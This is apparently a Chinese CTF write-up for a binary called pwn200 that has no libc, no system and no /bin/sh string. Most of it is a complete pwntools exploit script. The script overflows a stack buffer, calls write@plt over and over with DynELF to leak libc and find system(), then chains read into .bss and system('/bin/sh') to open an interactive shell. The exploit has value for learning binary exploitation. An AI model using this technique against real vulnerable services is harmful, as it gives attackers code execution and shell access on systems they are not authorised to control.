一道"三无"的题(无libc、无system、无/bin/sh)
利用pwntools的DynELF框架(专门解决泄露远程服务器libc的)
注:
1.要是看不懂参考上一篇简书:https://www.jianshu.com/p/590bc1d6c292
2.用write来泄露地址是最方便的
EXP
#!/usr/bin/python
#coding:utf-8
from pwn import*
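p = process('./pwn200')
elf = ELF("./pwn200")
write_plt_addr = elf.plt['write']  # PLT stub of write (author's note: elf.plt = elf.symbols)
read_plt_addr = elf.plt['read']    # PLT stub of read
print "[+]write_plt_addr:" + hex(write_plt_addr)
print "[+]read_plt_addr:" + hex(read_plt_addr)
# Fixed addresses below: the binary is loaded at a constant base (no PIE).
start_addr = 0x80483D0  # address every chain returns to so the program restarts and can be leaked again; main (or the function that calls main) works as well
pop3_ret_addr = 0x804856c  # pop;pop;pop;ret gadget: discards the three call arguments before returning (on the page this note was a bare parenthesised string, which does not parse)
bss_addr = 0x804A020  # writable .bss slot that will receive "/bin/sh"; NX only prevents executing stack memory, so a writable data address is fine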
def leak(addr):
    """Return 4 bytes of the process's memory at *addr*.

    DynELF calls this repeatedly to walk the remote libc. Each call overflows
    the vulnerable buffer again, returns into write@plt to print the bytes,
    and finally returns to start_addr so the program accepts input again.
    The primitive only works because the binary uses fixed addresses (no PIE)
    and the overflow reaches the saved return address unchecked; NX alone does
    not stop a return-into-PLT chain.
    """
    # Drain whatever the program printed before, so the leaked bytes are not
    # mixed with earlier output. (The author notes that sending the payload
    # without this read kept failing.)
    p.recvline()
    payload = "A"*112                   # padding up to the first return address
    payload += p32(write_plt_addr)      # return into write@plt
    payload += p32(pop3_ret_addr)       # presumably pop;pop;pop;ret: pops the three args below, then returns...
    payload += p32(1)                   #   fd   = stdout
    payload += p32(addr)                #   buf  = address to leak
    payload += p32(4)                   #   size = 4 bytes
    payload += p32(start_addr)          # ...to start_addr, restarting the program for the next leak
    p.send(payload)
    content = p.recv(4)
    # Python 2 str.encode('hex'); `content or ''` guards against an empty read.
    print ("%#x -> %s" % (addr,(content or '').encode('hex')))
    return content
# DynELF resolves system() in the remote libc using only the leak primitive;
# no local libc copy or offsets are required.
d = DynELF(leak, elf = elf)
print "******************************"
system_addr = d.lookup('system','libc')
log.info("system_addr = %#x",system_addr)
print "******************************"
# Final chain: read(0, bss_addr, 8) stores the string sent afterwards in .bss,
# then execution returns into system() with that .bss address as its argument.
payload = ''
payload += 'A'*112                  # same padding as in leak()
payload += p32(read_plt_addr)       # return into read@plt
payload += p32(pop3_ret_addr)       # pop;pop;pop;ret discards the three args below
payload += p32(0)                   #   fd   = stdin
payload += p32(bss_addr)            #   buf  = writable .bss slot
payload += p32(8)                   #   size = 8, the length of '/bin/sh\x00'
payload += p32(system_addr)         # then return into system()
payload += p32(0)                   #   return address for system() (never used)
payload += p32(bss_addr)            #   argument: the string just read into .bss
p.sendline(payload)
p.sendline('/bin/sh\x00')
p.interactive()